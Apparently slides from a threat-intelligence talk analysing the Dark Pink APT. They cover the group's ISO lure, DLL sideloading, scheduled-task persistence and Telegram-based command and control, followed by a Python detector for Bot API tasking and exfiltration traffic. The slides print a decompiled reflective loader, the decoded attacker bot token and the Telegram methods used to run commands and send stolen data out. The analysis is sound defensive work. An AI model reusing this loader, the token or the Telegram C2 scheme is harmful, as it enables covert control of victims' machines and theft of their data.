Unveiling Dark Pink: An In-Depth Analysis of APAC's Covert APT Threat

OUTLINE
- Dark Pink's latest campaign
- Telegram exfiltration and C2 demo
- TeleScout
- Dark Pink's TTPs

I GOT AN EMAIL! (Group-IB, 2023)

ISO FILE
- Signed winword.exe sideloads wwlib.dll
- Malicious wwlib.dll sets up persistence
- Extracts XOR-encrypted payload from the .doc lure
- Displays the .doc lure
- Sets up a scheduled task

SCHEDULED TASK
- "Microsoft Build Task" saved in the Temp folder
- Name wct*.tmp mimics normal OneDrive activity

BUILD TASK (decompiled loader, as shown on the slide)

    public static void main()
    {
        string stealer_module = init_br();
        string Telegram_Chat_ID = Encoding.Default.GetString(chat_id_numbers);
        // The embedded payload is a ZIP archive; the first entry is a .NET assembly
        var inputStream = new MemoryStream(main_payload);
        ZipArchive archive = new ZipArchive(inputStream, ZipArchiveMode.Read);
        ZipArchiveEntry archEntry = archive.Entries[0];
        Stream entryStream = archEntry.Open();
        var tmpMem = new MemoryStream();
        entryStream.CopyTo(tmpMem);
        var xtmp = tmpMem.ToArray();
        // Loaded reflectively from memory, so nothing is written to disk
        var memory_payload = Assembly.Load(xtmp);
        byte[] Telegram_BOT_API_token = Convert.FromBase64String("0vHS+db60vvU+t6IpY+WpaKzh4WRsLyc0IGcgo26opyMv4y+r7yHsKj9lo23+Q=");
        // Invoke the obfuscated entry method of every exported type, passing bot token, chat ID and stealer module
        foreach (Type type in memory_payload.GetExportedTypes())
        {
            try
            {
                var c = Activator.CreateInstance(type);
                type.InvokeMember("KaidnfAei", BindingFlags.InvokeMethod, null, c,
                                  new object[] { Telegram_BOT_API_token, Telegram_Chat_ID, stealer_module });
            }
            catch { continue; }
        }
    }

Decoded bot token: 6860236203:AAFrlFzcLuyXU4HxKisFUhvhwKucyL4rDS0

TELEGRAM BOT API
- Used to communicate with bots in Telegram chats
- HTTP-based interface
- Format: https://api.telegram.org/bot$token/$method?$params
- Important methods:
  - sendMessage?chat_id=&text= : sends a message to the specified chat
  - sendDocument?chat_id=&caption= : sends a document to the specified chat
  - getUpdates : retrieves the latest messages seen by the bot in Telegram chats

KAMIKAKABOT
- .NET executable
- Separate .NET stealer module
- Executes cmd.exe through /getUpdates
- Sends result back using /s
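As an added defender-side illustration of the Bot API URL pattern described above (not code from the talk), this Python check scans constructed proxy log lines and flags hosts that both poll getUpdates for tasking and push data back with sendMessage/sendDocument through the same bot; the log format, host names and bot token are assumed placeholders.

```python
import re
from collections import defaultdict

# URL shape from the slides: https://api.telegram.org/bot$token/$method?$params
BOT_API_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<token>\d+:[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)"
)
TASKING = {"getUpdates"}                 # bot polls for operator commands
EXFIL = {"sendMessage", "sendDocument"}  # bot pushes results or files out

def redact(token):
    """Keep only the numeric bot id so an alert does not carry a usable token."""
    return token.split(":", 1)[0] + ":<redacted>"

def parse_line(line):
    """Return (src_host, redacted_bot_id, method) for a Bot API hit, else None.
    Assumed constructed log format: '<timestamp> <src_host> <url>'."""
    parts = line.split()
    if len(parts) < 3:
        return None
    m = BOT_API_RE.search(parts[2])
    if not m:
        return None
    return parts[1], redact(m.group("token")), m.group("method")

def find_bot_c2(lines):
    """Flag hosts that both poll getUpdates and send data back via one bot."""
    methods_by_host = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec:
            host, bot, method = rec
            methods_by_host[(host, bot)].add(method)
    return {
        host: (bot, sorted(methods))
        for (host, bot), methods in methods_by_host.items()
        if methods & TASKING and methods & EXFIL
    }

# Constructed sample proxy lines (hosts and token are placeholders, not real IoCs)
SAMPLE_LOG = [
    "2024-01-01T10:00:00Z WS-042 https://api.telegram.org/bot123456789:PLACEHOLDER_TOKEN/getUpdates?offset=1",
    "2024-01-01T10:00:05Z WS-042 https://api.telegram.org/bot123456789:PLACEHOLDER_TOKEN/sendDocument?chat_id=1&caption=out",
    "2024-01-01T10:01:00Z WS-017 https://api.telegram.org/bot987654321:PLACEHOLDER_TOKEN/sendMessage?chat_id=2&text=build+ok",
    "2024-01-01T10:02:00Z WS-042 https://web.telegram.org/k/",
]

if __name__ == "__main__":
    for host, (bot, methods) in find_bot_c2(SAMPLE_LOG).items():
        print(f"{host}: bot {bot} uses {methods} (tasking + exfil pattern)")
```

A host that only ever calls sendMessage (a build notification bot, for example) is not flagged; the combination of polling and sending is what distinguishes the C2 loop on the slides from benign bot use.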